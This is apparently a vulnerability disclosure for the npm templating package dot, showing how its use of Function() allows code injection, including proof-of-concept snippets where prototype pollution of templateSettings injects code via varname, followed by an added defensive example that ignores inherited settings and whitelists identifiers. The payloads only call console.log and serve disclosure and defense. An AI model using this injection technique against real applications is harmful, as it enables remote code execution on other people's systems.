I would like to report a code injection vulnerability in dot.
It allows attackers to execute arbitrary JS code, especially when combined with a prototype pollution attack.
module name: dot
version: 1.1.2
npm page: https://www.npmjs.com/package/dot
Created in search of the fastest and concise JavaScript templating function with emphasis on performance under V8 and nodejs. It shows great performance for both nodejs and browsers.
doT.js is fast, small and has no dependencies.
76,838 downloads in the last week
dot uses Function() to compile templates. This can be exploited by an attacker who can control the template source, or who can control a value set on Object.prototype.
a) The basic attack vector
var doT = require("dot");
var tempFn = doT.template("<h1>Here is a sample template " +
"{{=console.log(23)}}</h1>");
tempFn({})
b) in combination with a prototype pollution attack
// template file placed under ./resources and exposed by process() as dots.mytemplate:
<h1>Here is a sample template</h1>
var doT = require("dot");
// prototype pollution attack vector
Object.prototype.templateSettings = {varname:"a,b,c,d,x=console.log(25)"};
// benign looking template compilation + application
var dots = require("dot").process({path: "./resources"});
dots.mytemplate();
Even though the template compilation and application look safe, the prototype pollution lets the attacker execute arbitrary code: process() reads templateSettings from an options object that does not own the property, so the polluted value is picked up and compiled into the template function.
N/A
Suggested fix: remove the Function() call.
The attacker can achieve code injection/RCE if she can control the template or if she can set arbitrary properties on Object.prototype. Using Function() with runtime-computed values is rarely safe.
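The following is an added example, not code from the dot project or from this report, showing the two checks a defender would want in front of any Function()-based template compiler: read settings only from the caller's own properties (so a value injected into Object.prototype is never consulted), and reject a varname that is not a plain comma-separated identifier list before it reaches Function(). All function names are hypothetical; the injected varname string is the one from section b), and the polluted options object is simulated with Object.create() rather than by modifying Object.prototype.

```javascript
// Added example (not doT's code): defensive resolution of templateSettings.
// Names are hypothetical; the unsafe varname value is the one from the report.

const DEFAULT_VARNAME = "it";

// A template variable list may only contain identifiers, e.g. "it" or
// "it, helpers". Anything with "=", "(", ";" etc. is code, not a name.
const IDENT_LIST = /^[A-Za-z_$][\w$]*(\s*,\s*[A-Za-z_$][\w$]*)*$/;

function isSafeVarname(varname) {
  return typeof varname === "string" && IDENT_LIST.test(varname);
}

// Read a setting without walking the prototype chain, so a property that
// was injected into Object.prototype (prototype pollution) is never used.
function ownSetting(obj, key, fallback) {
  const isObject = obj !== null && typeof obj === "object";
  return isObject && Object.prototype.hasOwnProperty.call(obj, key)
    ? obj[key]
    : fallback;
}

// Resolve the varname that would be handed to Function(); throw instead of
// compiling when it is not a plain identifier list.
function resolveVarname(options) {
  const settings = ownSetting(options, "templateSettings", {});
  const varname = ownSetting(settings, "varname", DEFAULT_VARNAME);
  if (!isSafeVarname(varname)) {
    throw new TypeError(
      "refusing to compile: unsafe templateSettings.varname " + JSON.stringify(varname)
    );
  }
  return varname;
}

// Constructed simulation of the report's pollution: the options object
// inherits templateSettings from its prototype instead of owning it, which
// is exactly what Object.prototype.templateSettings = {...} produces.
function simulatePollutedOptions() {
  const polluted = { templateSettings: { varname: "a,b,c,d,x=console.log(25)" } };
  return Object.create(polluted);
}

function demo() {
  const results = {};
  // explicit, benign settings pass through unchanged
  results.explicitOk = resolveVarname({ templateSettings: { varname: "it, helpers" } });
  // inherited (polluted) settings are ignored and the default is used
  results.inherited = resolveVarname(simulatePollutedOptions());
  // an explicitly supplied injected varname is rejected before compilation
  try {
    resolveVarname({ templateSettings: { varname: "a,b,c,d,x=console.log(25)" } });
    results.explicitBad = "compiled";
  } catch (e) {
    results.explicitBad = e instanceof TypeError ? "rejected" : "error";
  }
  return results;
}

console.log(demo());
```

Both checks matter: the own-property read neutralises the prototype pollution path from section b), and the identifier whitelist stops the injected value from ever being interpolated into Function() even when the caller passes it explicitly. Neither check helps against section a), where the template body itself is attacker-controlled; there the only real fix is to treat template sources as code and never compile untrusted ones.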